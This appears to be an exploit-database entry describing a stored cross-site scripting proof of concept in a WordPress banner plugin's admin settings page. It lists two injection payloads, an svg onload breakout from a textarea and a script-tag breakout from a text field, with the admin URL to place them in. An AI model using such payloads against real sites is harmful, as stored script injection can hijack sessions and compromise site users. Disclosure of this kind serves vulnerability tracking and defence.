Share
## https://sploitus.com/exploit?id=WPEX-ID:BC2E5BE3-CD2B-4EE9-8D7A-CABCE46B7092
As administrator, put the following payloads in the mentioned settings of the plugin (/wp-admin/options-general.php?page=bannerman) then save

- </textarea><svg/onload=prompt(/XSS/)> in any of the textarea fields, like "Style your banner with CSS:"
- "><script>alert(/XSS/)</script> in any of the text fields like "Background colour"